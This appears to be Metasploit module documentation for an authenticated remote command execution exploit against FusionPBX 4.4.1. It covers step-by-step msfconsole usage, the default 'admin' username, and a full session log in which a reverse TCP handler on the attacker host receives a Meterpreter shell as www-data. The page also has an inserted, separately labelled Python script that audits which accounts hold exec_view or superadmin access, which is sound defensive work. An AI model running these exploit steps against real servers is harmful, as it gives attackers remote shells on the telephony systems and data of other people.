## Description
This module uses administrative functionality available in FusionPBX
to gain a shell.
The Command section of the application permits users with `exec_view`
permissions, or superadmin permissions, to execute arbitrary system
commands, or arbitrary PHP code, as the web server user.
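
For defenders, the exposure described above comes down to which accounts hold `exec_view` or superadmin access. The audit sketch below is an added example, not part of this module or of FusionPBX; the CSV exports, their column names and the sample rows are assumptions constructed for illustration.

```python
import csv
import io

# Constructed sample exports; the column names are assumptions, not FusionPBX's schema.
GROUP_PERMISSIONS_CSV = """group_name,permission_name
superadmin,exec_view
admin,extension_view
support,exec_view
agent,call_center_view
"""
USER_GROUPS_CSV = """username,group_name
admin,superadmin
alice,admin
bob,support
dave,support
dave,agent
"""
RISKY_PERMISSION = "exec_view"   # permission named on this page
SUPERADMIN_GROUP = "superadmin"  # superadmin users can also reach the Command section
DEFAULT_USERNAME = "admin"       # default shown for the USERNAME option


def load(text):
    """Parse a CSV export into a list of dict rows."""
    return list(csv.DictReader(io.StringIO(text)))


def command_exec_exposure(group_perms, user_groups):
    """Return {username: [reasons]} for accounts that can run commands."""
    risky_groups = {r["group_name"] for r in group_perms
                    if r["permission_name"] == RISKY_PERMISSION}
    exposure = {}
    for row in user_groups:
        user, group = row["username"], row["group_name"]
        reasons = exposure.setdefault(user, set())
        if group == SUPERADMIN_GROUP:
            reasons.add("member of superadmin")
        if group in risky_groups:
            reasons.add(f"group '{group}' holds {RISKY_PERMISSION}")
    result = {u: sorted(r) for u, r in exposure.items() if r}
    if DEFAULT_USERNAME in result:
        result[DEFAULT_USERNAME].append("uses the default username")
    return result


if __name__ == "__main__":
    found = command_exec_exposure(load(GROUP_PERMISSIONS_CSV), load(USER_GROUPS_CSV))
    for user, reasons in sorted(found.items()):
        print(f"{user}: {'; '.join(reasons)}")
```

Every account it lists can run commands as the web server user, so each one warrants a strong password and a review of whether it needs that access at all.
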
## Vulnerable Software
This module has been tested successfully on FusionPBX version
4.4.1 on Ubuntu 19.04 (x64).
Software:
* https://www.fusionpbx.com/download
* https://github.com/fusionpbx/fusionpbx/releases
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/fusionpbx_exec_cmd_exec`
3. Do: `set rhosts <IP>`
4. Do: `set username <username>` (default: `admin`)
5. Do: `set password <password>`
6. Do: `run`
7. You should get a new session
## Options
**TARGETURI**

The base path to FusionPBX (default: `/`)

**USERNAME**

The username for FusionPBX (default: `admin`)

**PASSWORD**

The password for FusionPBX

## Scenarios
```
msf > use exploit/unix/webapp/fusionpbx_exec_cmd_exec
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
rhosts => 172.16.191.214
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
username => admin
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
password => PXRtwZqSkvToC4gc
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
   1   Automatic (Unix In-Memory)
   2   Automatic (Linux Dropper)

msf exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] Authenticated as user 'admin'
[*] Sending payload (1115 bytes) ...
[*] Sending stage (38288 bytes) to 172.16.191.214
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter >
```